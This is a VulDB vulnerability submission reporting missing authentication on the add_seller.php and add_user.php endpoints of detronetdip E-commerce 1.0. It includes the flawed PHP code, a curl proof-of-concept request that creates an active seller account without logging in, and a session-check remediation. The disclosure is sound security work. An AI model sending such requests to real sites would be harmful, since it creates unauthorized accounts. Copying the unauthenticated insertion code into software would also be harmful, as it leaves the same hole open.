| Title | detronetdip E-commerce 1.0 Access Control Violation |
|---|
| Description | Severity: CRITICAL (9.8)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Bug Type: CWE-306: Missing Authentication for Critical Function
The backend scripts responsible for creating new User and Seller accounts completely lack authentication or authorization checks. These files are directly accessible via HTTP requests (Admin/assets/backend/...).
The application architecture assumes that users will only access these files via the Admin Dashboard UI, which is protected by a login page. However, the backend processing scripts themselves do not verify if the request was initiated by an authenticated administrator. This allows an unauthenticated external attacker to create valid User and Seller accounts, bypassing any frontend approval workflows or registration closures.
Vulnerable Files:
- Admin/assets/backend/seller/add_seller.php
- Admin/assets/backend/user/add_user.php
Vulnerable Code Analysis:
File: Admin/assets/backend/seller/add_seller.php
require('../../../../utility/utility.php');
// FLAW: No session_start() is called to resume a session.
// FLAW: No check is performed to verify if $_SESSION['ADMIN_ID'] is set.
// The code proceeds directly to database insertion.
$email=get_safe_value($con,$_POST['email']);
$password=password_hash($pass, PASSWORD_DEFAULT);
// The attacker-supplied data is inserted directly into the 'sellers' table.
mysqli_query($con,"insert into sellers (password,mobile,email,status,is_new) values ('$password','$mobile','$email','1','1')");
echo 1;
Exploit Proof of Concept (PoC)
Exploit Command: The attacker sends a direct POST request to the backend file to create a seller account with the status "Active" (1).
curl -X POST \
-d "[email protected]" \
-d "pass=password123" \
-d "mobile=0000000000" \
"http://localhost:3000/Admin/assets/backend/seller/add_seller.php"
Output:
1
Impact
- Authorization Bypass: Attackers can create accounts even if public registration is disabled.
- Privilege Escalation: By creating a "Seller" account, the attacker gains access to the seller dashboard, which is a prerequisite for exploiting other vulnerabilities (such as the IDORs mentioned above).
- Spam/Fraud: Attackers can flood the database with fake accounts, degrading database performance and complicating user management.
Remediation Recommendations:
Enforce Authentication on Backend Endpoints
- To mitigate the Broken Access Control, every backend PHP file must verify the user's session state before processing any data. Add the following check at the very top of add_seller.php and add_user.php:
session_start();
if (!isset($_SESSION['IS_LOGIN_ADMIN']) || $_SESSION['IS_LOGIN_ADMIN'] !== "YES") {
http_response_code(403);
die("Unauthorized Access");
} |
|---|
| Source | ⚠️ https://github.com/Nixon-H/Unauthenticated-Admin-Account-Creation |
|---|
| User | Nixon-H (UID 95173) |
|---|
| Submission | 02/04/2026 07:37 (3 months ago) |
|---|
| Moderation | 02/07/2026 10:11 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 344867 [detronetdip E-commerce 1.0.0 Account Creation Endpoint add_seller.php email missing authentication] |
|---|
| Points | 20 |
|---|